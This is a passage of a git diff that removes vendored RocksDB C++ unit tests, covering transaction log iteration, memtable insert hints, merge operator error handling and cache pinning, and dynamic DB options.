-    dbfull()->FlushWAL(false);
-    // Try to read from the beginning. Should stop before the gap and read less
-    // than 1025 entries
-    auto iter = OpenTransactionLogIter(0);
-    int count;
-    SequenceNumber last_sequence_read = ReadRecords(iter, count);
-    ASSERT_LT(last_sequence_read, 1025U);
-    // Try to read past the gap, should be able to seek to key1025
-    auto iter2 = OpenTransactionLogIter(last_sequence_read + 1);
-    ExpectRecords(1, iter2);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorBatchOperations) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    WriteBatch batch;
-    batch.Put(handles_[1], "key1", DummyString(1024));
-    batch.Put(handles_[0], "key2", DummyString(1024));
-    batch.Put(handles_[1], "key3", DummyString(1024));
-    batch.Delete(handles_[0], "key2");
-    dbfull()->Write(WriteOptions(), &batch);
-    Flush(1);
-    Flush(0);
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    Put(1, "key4", DummyString(1024));
-    auto iter = OpenTransactionLogIter(3);
-    ExpectRecords(2, iter);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorBlobs) {
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  {
-    WriteBatch batch;
-    batch.Put(handles_[1], "key1", DummyString(1024));
-    batch.Put(handles_[0], "key2", DummyString(1024));
-    batch.PutLogData(Slice("blob1"));
-    batch.Put(handles_[1], "key3", DummyString(1024));
-    batch.PutLogData(Slice("blob2"));
-    batch.Delete(handles_[0], "key2");
-    dbfull()->Write(WriteOptions(), &batch);
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  }
-
-  auto res = OpenTransactionLogIter(0)->GetBatch();
-  struct Handler : public WriteBatch::Handler {
-    std::string seen;
-    virtual Status PutCF(uint32_t cf, const Slice& key,
-                         const Slice& value) override {
-      seen += "Put(" + ToString(cf) + ", " + key.ToString() + ", " +
-              ToString(value.size()) + ")";
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t cf, const Slice& key,
-                           const Slice& value) override {
-      seen += "Merge(" + ToString(cf) + ", " + key.ToString() + ", " +
-              ToString(value.size()) + ")";
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      seen += "LogData(" + blob.ToString() + ")";
-    }
-    virtual Status DeleteCF(uint32_t cf, const Slice& key) override {
-      seen += "Delete(" + ToString(cf) + ", " + key.ToString() + ")";
-      return Status::OK();
-    }
-  } handler;
-  res.writeBatchPtr->Iterate(&handler);
-  ASSERT_EQ(
-      "Put(1, key1, 1024)"
-      "Put(0, key2, 1024)"
-      "LogData(blob1)"
-      "Put(1, key3, 1024)"
-      "LogData(blob2)"
-      "Delete(0, key2)",
-      handler.seen);
-}
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_memtable_test.cc b/thirdparty/rocksdb/db/db_memtable_test.cc
deleted file mode 100644
index 63d274f..0000000
--- a/thirdparty/rocksdb/db/db_memtable_test.cc
+++ /dev/null
@@ -1,195 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include <string>
-
-#include "db/db_test_util.h"
-#include "db/memtable.h"
-#include "port/stack_trace.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice_transform.h"
-
-namespace rocksdb {
-
-class DBMemTableTest : public DBTestBase {
- public:
-  DBMemTableTest() : DBTestBase("/db_memtable_test") {}
-};
-
-class MockMemTableRep : public MemTableRep {
- public:
-  explicit MockMemTableRep(Allocator* allocator, MemTableRep* rep)
-      : MemTableRep(allocator), rep_(rep), num_insert_with_hint_(0) {}
-
-  virtual KeyHandle Allocate(const size_t len, char** buf) override {
-    return rep_->Allocate(len, buf);
-  }
-
-  virtual void Insert(KeyHandle handle) override {
-    return rep_->Insert(handle);
-  }
-
-  virtual void InsertWithHint(KeyHandle handle, void** hint) override {
-    num_insert_with_hint_++;
-    ASSERT_NE(nullptr, hint);
-    last_hint_in_ = *hint;
-    rep_->InsertWithHint(handle, hint);
-    last_hint_out_ = *hint;
-  }
-
-  virtual bool Contains(const char* key) const override {
-    return rep_->Contains(key);
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override {
-    rep_->Get(k, callback_args, callback_func);
-  }
-
-  virtual size_t ApproximateMemoryUsage() override {
-    return rep_->ApproximateMemoryUsage();
-  }
-
-  virtual Iterator* GetIterator(Arena* arena) override {
-    return rep_->GetIterator(arena);
-  }
-
-  void* last_hint_in() { return last_hint_in_; }
-  void* last_hint_out() { return last_hint_out_; }
-  int num_insert_with_hint() { return num_insert_with_hint_; }
-
- private:
-  std::unique_ptr<MemTableRep> rep_;
-  void* last_hint_in_;
-  void* last_hint_out_;
-  int num_insert_with_hint_;
-};
-
-class MockMemTableRepFactory : public MemTableRepFactory {
- public:
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator& cmp,
-                                         Allocator* allocator,
-                                         const SliceTransform* transform,
-                                         Logger* logger) override {
-    SkipListFactory factory;
-    MemTableRep* skiplist_rep =
-        factory.CreateMemTableRep(cmp, allocator, transform, logger);
-    mock_rep_ = new MockMemTableRep(allocator, skiplist_rep);
-    return mock_rep_;
-  }
-
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator& cmp,
-                                         Allocator* allocator,
-                                         const SliceTransform* transform,
-                                         Logger* logger,
-                                         uint32_t column_family_id) override {
-    last_column_family_id_ = column_family_id;
-    return CreateMemTableRep(cmp, allocator, transform, logger);
-  }
-
-  virtual const char* Name() const override { return "MockMemTableRepFactory"; }
-
-  MockMemTableRep* rep() { return mock_rep_; }
-
-  bool IsInsertConcurrentlySupported() const override { return false; }
-
-  uint32_t GetLastColumnFamilyId() { return last_column_family_id_; }
-
- private:
-  MockMemTableRep* mock_rep_;
-  // workaround since there's no port::kMaxUint32 yet.
-  uint32_t last_column_family_id_ = static_cast<uint32_t>(-1);
-};
-
-class TestPrefixExtractor : public SliceTransform {
- public:
-  virtual const char* Name() const override { return "TestPrefixExtractor"; }
-
-  virtual Slice Transform(const Slice& key) const override {
-    const char* p = separator(key);
-    if (p == nullptr) {
-      return Slice();
-    }
-    return Slice(key.data(), p - key.data() + 1);
-  }
-
-  virtual bool InDomain(const Slice& key) const override {
-    return separator(key) != nullptr;
-  }
-
-  virtual bool InRange(const Slice& key) const override { return false; }
-
- private:
-  const char* separator(const Slice& key) const {
-    return reinterpret_cast<const char*>(memchr(key.data(), '_', key.size()));
-  }
-};
-
-TEST_F(DBMemTableTest, InsertWithHint) {
-  Options options;
-  options.allow_concurrent_memtable_write = false;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(new MockMemTableRepFactory());
-  options.memtable_insert_with_hint_prefix_extractor.reset(
-      new TestPrefixExtractor());
-  options.env = env_;
-  Reopen(options);
-  MockMemTableRep* rep =
-      reinterpret_cast<MockMemTableRepFactory*>(options.memtable_factory.get())
-          ->rep();
-  ASSERT_OK(Put("foo_k1", "foo_v1"));
-  ASSERT_EQ(nullptr, rep->last_hint_in());
-  void* hint_foo = rep->last_hint_out();
-  ASSERT_OK(Put("foo_k2", "foo_v2"));
-  ASSERT_EQ(hint_foo, rep->last_hint_in());
-  ASSERT_EQ(hint_foo, rep->last_hint_out());
-  ASSERT_OK(Put("foo_k3", "foo_v3"));
-  ASSERT_EQ(hint_foo, rep->last_hint_in());
-  ASSERT_EQ(hint_foo, rep->last_hint_out());
-  ASSERT_OK(Put("bar_k1", "bar_v1"));
-  ASSERT_EQ(nullptr, rep->last_hint_in());
-  void* hint_bar = rep->last_hint_out();
-  ASSERT_NE(hint_foo, hint_bar);
-  ASSERT_OK(Put("bar_k2", "bar_v2"));
-  ASSERT_EQ(hint_bar, rep->last_hint_in());
-  ASSERT_EQ(hint_bar, rep->last_hint_out());
-  ASSERT_EQ(5, rep->num_insert_with_hint());
-  ASSERT_OK(Put("whitelisted", "vvv"));
-  ASSERT_EQ(5, rep->num_insert_with_hint());
-  ASSERT_EQ("foo_v1", Get("foo_k1"));
-  ASSERT_EQ("foo_v2", Get("foo_k2"));
-  ASSERT_EQ("foo_v3", Get("foo_k3"));
-  ASSERT_EQ("bar_v1", Get("bar_k1"));
-  ASSERT_EQ("bar_v2", Get("bar_k2"));
-  ASSERT_EQ("vvv", Get("whitelisted"));
-}
-
-TEST_F(DBMemTableTest, ColumnFamilyId) {
-  // Verifies MemTableRepFactory is told the right column family id.
-  Options options;
-  options.allow_concurrent_memtable_write = false;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(new MockMemTableRepFactory());
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (int cf = 0; cf < 2; ++cf) {
-    ASSERT_OK(Put(cf, "key", "val"));
-    ASSERT_OK(Flush(cf));
-    ASSERT_EQ(
-        cf, static_cast<MockMemTableRepFactory*>(options.memtable_factory.get())
-                ->GetLastColumnFamilyId());
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_merge_operator_test.cc b/thirdparty/rocksdb/db/db_merge_operator_test.cc
deleted file mode 100644
index de28619..0000000
--- a/thirdparty/rocksdb/db/db_merge_operator_test.cc
+++ /dev/null
@@ -1,367 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include <string>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "db/forward_iterator.h"
-#include "port/stack_trace.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// Test merge operator functionality.
-class DBMergeOperatorTest : public DBTestBase {
- public:
-  DBMergeOperatorTest() : DBTestBase("/db_merge_operator_test") {}
-};
-
-TEST_F(DBMergeOperatorTest, MergeErrorOnRead) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new TestPutOperator());
-  options.env = env_;
-  Reopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Merge("k1", "corrupted"));
-  std::string value;
-  ASSERT_TRUE(db_->Get(ReadOptions(), "k1", &value).IsCorruption());
-  VerifyDBInternal({{"k1", "corrupted"}, {"k1", "v1"}});
-}
-
-TEST_F(DBMergeOperatorTest, MergeErrorOnWrite) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new TestPutOperator());
-  options.max_successive_merges = 3;
-  options.env = env_;
-  Reopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Merge("k1", "v2"));
-  // Will trigger a merge when hitting max_successive_merges and the merge
-  // will fail. The delta will be inserted nevertheless.
-  ASSERT_OK(Merge("k1", "corrupted"));
-  // Data should stay unmerged after the error.
-  VerifyDBInternal({{"k1", "corrupted"}, {"k1", "v2"}, {"k1", "v1"}});
-}
-
-TEST_F(DBMergeOperatorTest, MergeErrorOnIteration) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new TestPutOperator());
-  options.env = env_;
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Merge("k1", "corrupted"));
-  ASSERT_OK(Put("k2", "v2"));
-  VerifyDBFromMap({{"k1", ""}, {"k2", "v2"}}, nullptr, false,
-                  {{"k1", Status::Corruption()}});
-  VerifyDBInternal({{"k1", "corrupted"}, {"k1", "v1"}, {"k2", "v2"}});
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Put("k2", "v2"));
-  ASSERT_OK(Merge("k2", "corrupted"));
-  VerifyDBFromMap({{"k1", "v1"}, {"k2", ""}}, nullptr, false,
-                  {{"k2", Status::Corruption()}});
-  VerifyDBInternal({{"k1", "v1"}, {"k2", "corrupted"}, {"k2", "v2"}});
-}
-
-
-class MergeOperatorPinningTest : public DBMergeOperatorTest,
-                                 public testing::WithParamInterface<bool> {
- public:
-  MergeOperatorPinningTest() { disable_block_cache_ = GetParam(); }
-
-  bool disable_block_cache_;
-};
-
-INSTANTIATE_TEST_CASE_P(MergeOperatorPinningTest, MergeOperatorPinningTest,
-                        ::testing::Bool());
-
-#ifndef ROCKSDB_LITE
-TEST_P(MergeOperatorPinningTest, OperandsMultiBlocks) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1;  // every block will contain one entry
-  table_options.no_block_cache = disable_block_cache_;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.merge_operator = MergeOperators::CreateStringAppendTESTOperator();
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  const int kKeysPerFile = 10;
-  const int kOperandsPerKeyPerFile = 7;
-  const int kOperandSize = 100;
-  // Filse to write in L0 before compacting to lower level
-  const int kFilesPerLevel = 3;
-
-  Random rnd(301);
-  std::map<std::string, std::string> true_data;
-  int batch_num = 1;
-  int lvl_to_fill = 4;
-  int key_id = 0;
-  while (true) {
-    for (int j = 0; j < kKeysPerFile; j++) {
-      std::string key = Key(key_id % 35);
-      key_id++;
-      for (int k = 0; k < kOperandsPerKeyPerFile; k++) {
-        std::string val = RandomString(&rnd, kOperandSize);
-        ASSERT_OK(db_->Merge(WriteOptions(), key, val));
-        if (true_data[key].size() == 0) {
-          true_data[key] = val;
-        } else {
-          true_data[key] += "," + val;
-        }
-      }
-    }
-
-    if (lvl_to_fill == -1) {
-      // Keep last batch in memtable and stop
-      break;
-    }
-
-    ASSERT_OK(Flush());
-    if (batch_num % kFilesPerLevel == 0) {
-      if (lvl_to_fill != 0) {
-        MoveFilesToLevel(lvl_to_fill);
-      }
-      lvl_to_fill--;
-    }
-    batch_num++;
-  }
-
-  // 3 L0 files
-  // 1 L1 file
-  // 3 L2 files
-  // 1 L3 file
-  // 3 L4 Files
-  ASSERT_EQ(FilesPerLevel(), "3,1,3,1,3");
-
-  VerifyDBFromMap(true_data);
-}
-
-TEST_P(MergeOperatorPinningTest, Randomized) {
-  do {
-    Options options = CurrentOptions();
-    options.merge_operator = MergeOperators::CreateMaxOperator();
-    BlockBasedTableOptions table_options;
-    table_options.no_block_cache = disable_block_cache_;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    std::map<std::string, std::string> true_data;
-
-    const int kTotalMerges = 10000;
-    // Every key gets ~10 operands
-    const int kKeyRange = kTotalMerges / 10;
-    const int kOperandSize = 20;
-    const int kNumPutBefore = kKeyRange / 10;  // 10% value
-    const int kNumPutAfter = kKeyRange / 10;   // 10% overwrite
-    const int kNumDelete = kKeyRange / 10;     // 10% delete
-
-    // kNumPutBefore keys will have base values
-    for (int i = 0; i < kNumPutBefore; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      std::string value = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-      true_data[key] = value;
-    }
-
-    // Do kTotalMerges merges
-    for (int i = 0; i < kTotalMerges; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      std::string value = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Merge(WriteOptions(), key, value));
-
-      if (true_data[key] < value) {
-        true_data[key] = value;
-      }
-    }
-
-    // Overwrite random kNumPutAfter keys
-    for (int i = 0; i < kNumPutAfter; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      std::string value = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-      true_data[key] = value;
-    }
-
-    // Delete random kNumDelete keys
-    for (int i = 0; i < kNumDelete; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      ASSERT_OK(db_->Delete(WriteOptions(), key));
-
-      true_data.erase(key);
-    }
-
-    VerifyDBFromMap(true_data);
-
-    // Skip HashCuckoo since it does not support merge operators
-  } while (ChangeOptions(kSkipMergePut | kSkipHashCuckoo));
-}
-
-class MergeOperatorHook : public MergeOperator {
- public:
-  explicit MergeOperatorHook(std::shared_ptr<MergeOperator> _merge_op)
-      : merge_op_(_merge_op) {}
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    before_merge_();
-    bool res = merge_op_->FullMergeV2(merge_in, merge_out);
-    after_merge_();
-    return res;
-  }
-
-  virtual const char* Name() const override { return merge_op_->Name(); }
-
-  std::shared_ptr<MergeOperator> merge_op_;
-  std::function<void()> before_merge_ = []() {};
-  std::function<void()> after_merge_ = []() {};
-};
-
-TEST_P(MergeOperatorPinningTest, EvictCacheBeforeMerge) {
-  Options options = CurrentOptions();
-
-  auto merge_hook =
-      std::make_shared<MergeOperatorHook>(MergeOperators::CreateMaxOperator());
-  options.merge_operator = merge_hook;
-  options.disable_auto_compactions = true;
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.max_open_files = 20;
-  BlockBasedTableOptions bbto;
-  bbto.no_block_cache = disable_block_cache_;
-  if (bbto.no_block_cache == false) {
-    bbto.block_cache = NewLRUCache(64 * 1024 * 1024);
-  } else {
-    bbto.block_cache = nullptr;
-  }
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyAndReopen(options);
-
-  const int kNumOperands = 30;
-  const int kNumKeys = 1000;
-  const int kOperandSize = 100;
-  Random rnd(301);
-
-  // 1000 keys every key have 30 operands, every operand is in a different file
-  std::map<std::string, std::string> true_data;
-  for (int i = 0; i < kNumOperands; i++) {
-    for (int j = 0; j < kNumKeys; j++) {
-      std::string k = Key(j);
-      std::string v = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Merge(WriteOptions(), k, v));
-
-      true_data[k] = std::max(true_data[k], v);
-    }
-    ASSERT_OK(Flush());
-  }
-
-  std::vector<uint64_t> file_numbers = ListTableFiles(env_, dbname_);
-  ASSERT_EQ(file_numbers.size(), kNumOperands);
-  int merge_cnt = 0;
-
-  // Code executed before merge operation
-  merge_hook->before_merge_ = [&]() {
-    // Evict all tables from cache before every merge operation
-    for (uint64_t num : file_numbers) {
-      TableCache::Evict(dbfull()->TEST_table_cache(), num);
-    }
-    // Decrease cache capacity to force all unrefed blocks to be evicted
-    if (bbto.block_cache) {
-      bbto.block_cache->SetCapacity(1);
-    }
-    merge_cnt++;
-  };
-
-  // Code executed after merge operation
-  merge_hook->after_merge_ = [&]() {
-    // Increase capacity again after doing the merge
-    if (bbto.block_cache) {
-      bbto.block_cache->SetCapacity(64 * 1024 * 1024);
-    }
-  };
-
-  size_t total_reads;
-  VerifyDBFromMap(true_data, &total_reads);
-  ASSERT_EQ(merge_cnt, total_reads);
-
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  VerifyDBFromMap(true_data, &total_reads);
-}
-
-TEST_P(MergeOperatorPinningTest, TailingIterator) {
-  Options options = CurrentOptions();
-  options.merge_operator = MergeOperators::CreateMaxOperator();
-  BlockBasedTableOptions bbto;
-  bbto.no_block_cache = disable_block_cache_;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyAndReopen(options);
-
-  const int kNumOperands = 100;
-  const int kNumWrites = 100000;
-
-  std::function<void()> writer_func = [&]() {
-    int k = 0;
-    for (int i = 0; i < kNumWrites; i++) {
-      db_->Merge(WriteOptions(), Key(k), Key(k));
-
-      if (i && i % kNumOperands == 0) {
-        k++;
-      }
-      if (i && i % 127 == 0) {
-        ASSERT_OK(Flush());
-      }
-      if (i && i % 317 == 0) {
-        ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-      }
-    }
-  };
-
-  std::function<void()> reader_func = [&]() {
-    ReadOptions ro;
-    ro.tailing = true;
-    Iterator* iter = db_->NewIterator(ro);
-
-    iter->SeekToFirst();
-    for (int i = 0; i < (kNumWrites / kNumOperands); i++) {
-      while (!iter->Valid()) {
-        // wait for the key to be written
-        env_->SleepForMicroseconds(100);
-        iter->Seek(Key(i));
-      }
-      ASSERT_EQ(iter->key(), Key(i));
-      ASSERT_EQ(iter->value(), Key(i));
-
-      iter->Next();
-    }
-
-    delete iter;
-  };
-
-  rocksdb::port::Thread writer_thread(writer_func);
-  rocksdb::port::Thread reader_thread(reader_func);
-
-  writer_thread.join();
-  reader_thread.join();
-}
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_options_test.cc b/thirdparty/rocksdb/db/db_options_test.cc
deleted file mode 100644
index 243748f..0000000
--- a/thirdparty/rocksdb/db/db_options_test.cc
+++ /dev/null
@@ -1,452 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include <limits>
-#include <string>
-#include <unordered_map>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "options/options_helper.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/rate_limiter.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class DBOptionsTest : public DBTestBase {
- public:
-  DBOptionsTest() : DBTestBase("/db_options_test") {}
-
-#ifndef ROCKSDB_LITE
-  std::unordered_map<std::string, std::string> GetMutableDBOptionsMap(
-      const DBOptions& options) {
-    std::string options_str;
-    GetStringFromDBOptions(&options_str, options);
-    std::unordered_map<std::string, std::string> options_map;
-    StringToMap(options_str, &options_map);
-    std::unordered_map<std::string, std::string> mutable_map;
-    for (const auto opt : db_options_type_info) {
-      if (opt.second.is_mutable &&
-          opt.second.verification != OptionVerificationType::kDeprecated) {
-        mutable_map[opt.first] = options_map[opt.first];
-      }
-    }
-    return mutable_map;
-  }
-
-  std::unordered_map<std::string, std::string> GetMutableCFOptionsMap(
-      const ColumnFamilyOptions& options) {
-    std::string options_str;
-    GetStringFromColumnFamilyOptions(&options_str, options);
-    std::unordered_map<std::string, std::string> options_map;
-    StringToMap(options_str, &options_map);
-    std::unordered_map<std::string, std::string> mutable_map;
-    for (const auto opt : cf_options_type_info) {
-      if (opt.second.is_mutable &&
-          opt.second.verification != OptionVerificationType::kDeprecated) {
-        mutable_map[opt.first] = options_map[opt.first];
-      }
-    }
-    return mutable_map;
-  }
-
-  std::unordered_map<std::string, std::string> GetRandomizedMutableCFOptionsMap(
-      Random* rnd) {
-    Options options;
-    options.env = env_;
-    ImmutableDBOptions db_options(options);
-    test::RandomInitCFOptions(&options, rnd);
-    auto sanitized_options = SanitizeOptions(db_options, options);
-    auto opt_map = GetMutableCFOptionsMap(sanitized_options);
-    delete options.compaction_filter;
-    return opt_map;
-  }
-
-  std::unordered_map<std::string, std::string> GetRandomizedMutableDBOptionsMap(
-      Random* rnd) {
-    DBOptions db_options;
-    test::RandomInitDBOptions(&db_options, rnd);
-    auto sanitized_options = SanitizeOptions(dbname_, db_options);
-    return GetMutableDBOptionsMap(sanitized_options);
-  }
-#endif  // ROCKSDB_LITE
-};
-
-// RocksDB lite don't support dynamic options.
-#ifndef ROCKSDB_LITE
-
-TEST_F(DBOptionsTest, GetLatestDBOptions) {
-  // GetOptions should be able to get latest option changed by SetOptions.
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  Random rnd(228);
-  Reopen(options);
-  auto new_options = GetRandomizedMutableDBOptionsMap(&rnd);
-  ASSERT_OK(dbfull()->SetDBOptions(new_options));
-  ASSERT_EQ(new_options, GetMutableDBOptionsMap(dbfull()->GetDBOptions()));
-}
-
-TEST_F(DBOptionsTest, GetLatestCFOptions) {
-  // GetOptions should be able to get latest option changed by SetOptions.
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  Random rnd(228);
-  Reopen(options);
-  CreateColumnFamilies({"foo"}, options);
-  ReopenWithColumnFamilies({"default", "foo"}, options);
-  auto options_default = GetRandomizedMutableCFOptionsMap(&rnd);
-  auto options_foo = GetRandomizedMutableCFOptionsMap(&rnd);
-  ASSERT_OK(dbfull()->SetOptions(handles_[0], options_default));
-  ASSERT_OK(dbfull()->SetOptions(handles_[1], options_foo));
-  ASSERT_EQ(options_default,
-            GetMutableCFOptionsMap(dbfull()->GetOptions(handles_[0])));
-  ASSERT_EQ(options_foo,
-            GetMutableCFOptionsMap(dbfull()->GetOptions(handles_[1])));
-}
-
-TEST_F(DBOptionsTest, SetOptionsAndReopen) {
-  Random rnd(1044);
-  auto rand_opts = GetRandomizedMutableCFOptionsMap(&rnd);
-  ASSERT_OK(dbfull()->SetOptions(rand_opts));
-  // Verify if DB can be reopen after setting options.
-  Options options;
-  options.env = env_;
-  ASSERT_OK(TryReopen(options));
-}
-
-TEST_F(DBOptionsTest, EnableAutoCompactionAndTriggerStall) {
-  const std::string kValue(1024, 'v');
-  for (int method_type = 0; method_type < 2; method_type++) {
-    for (int option_type = 0; option_type < 4; option_type++) {
-      Options options;
-      options.create_if_missing = true;
-      options.disable_auto_compactions = true;
-      options.write_buffer_size = 1024 * 1024 * 10;
-      options.compression = CompressionType::kNoCompression;
-      options.level0_file_num_compaction_trigger = 1;
-      options.level0_stop_writes_trigger = std::numeric_limits<int>::max();
-      options.level0_slowdown_writes_trigger = std::numeric_limits<int>::max();
-      options.hard_pending_compaction_bytes_limit =
-          std::numeric_limits<uint64_t>::max();
-      options.soft_pending_compaction_bytes_limit =
-          std::numeric_limits<uint64_t>::max();
-      options.env = env_;
-
-      DestroyAndReopen(options);
-      int i = 0;
-      for (; i < 1024; i++) {
-        Put(Key(i), kValue);
-      }
-      Flush();
-      for (; i < 1024 * 2; i++) {
-        Put(Key(i), kValue);
-      }
-      Flush();
-      dbfull()->TEST_WaitForFlushMemTable();
-      ASSERT_EQ(2, NumTableFilesAtLevel(0));
-      uint64_t l0_size = SizeAtLevel(0);
-
-      switch (option_type) {
-        case 0:
-          // test with level0_stop_writes_trigger
-          options.level0_stop_writes_trigger = 2;
-          options.level0_slowdown_writes_trigger = 2;
-          break;
-        case 1:
-          options.level0_slowdown_writes_trigger = 2;
-          break;
-        case 2:
-          options.hard_pending_compaction_bytes_limit = l0_size;
-          options.soft_pending_compaction_bytes_limit = l0_size;
-          break;
-        case 3:
-          options.soft_pending_compaction_bytes_limit = l0_size;
-          break;
-      }
-      Reopen(options);
-      dbfull()->TEST_WaitForCompact();
-      ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-      ASSERT_FALSE(dbfull()->TEST_write_controler().NeedsDelay());
-
-      SyncPoint::GetInstance()->LoadDependency(
-          {{"DBOptionsTest::EnableAutoCompactionAndTriggerStall:1",
-            "BackgroundCallCompaction:0"},
-           {"DBImpl::BackgroundCompaction():BeforePickCompaction",
-            "DBOptionsTest::EnableAutoCompactionAndTriggerStall:2"},
-           {"DBOptionsTest::EnableAutoCompactionAndTriggerStall:3",
-            "DBImpl::BackgroundCompaction():AfterPickCompaction"}});
-      // Block background compaction.
-      SyncPoint::GetInstance()->EnableProcessing();
-
-      switch (method_type) {
-        case 0:
-          ASSERT_OK(
-              dbfull()->SetOptions({{"disable_auto_compactions", "false"}}));
-          break;
-        case 1:
-          ASSERT_OK(dbfull()->EnableAutoCompaction(
-              {dbfull()->DefaultColumnFamily()}));
-          break;
-      }
-      TEST_SYNC_POINT("DBOptionsTest::EnableAutoCompactionAndTriggerStall:1");
-      // Wait for stall condition recalculate.
-      TEST_SYNC_POINT("DBOptionsTest::EnableAutoCompactionAndTriggerStall:2");
-
-      switch (option_type) {
-        case 0:
-          ASSERT_TRUE(dbfull()->TEST_write_controler().IsStopped());
-          break;
-        case 1:
-          ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-          ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-          break;
-        case 2:
-          ASSERT_TRUE(dbfull()->TEST_write_controler().IsStopped());
-          break;
-        case 3:
-          ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-          ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-          break;
-      }
-      TEST_SYNC_POINT("DBOptionsTest::EnableAutoCompactionAndTriggerStall:3");
-
-      // Background compaction executed.
-      dbfull()->TEST_WaitForCompact();
-      ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-      ASSERT_FALSE(dbfull()->TEST_write_controler().NeedsDelay());
-    }
-  }
-}
-
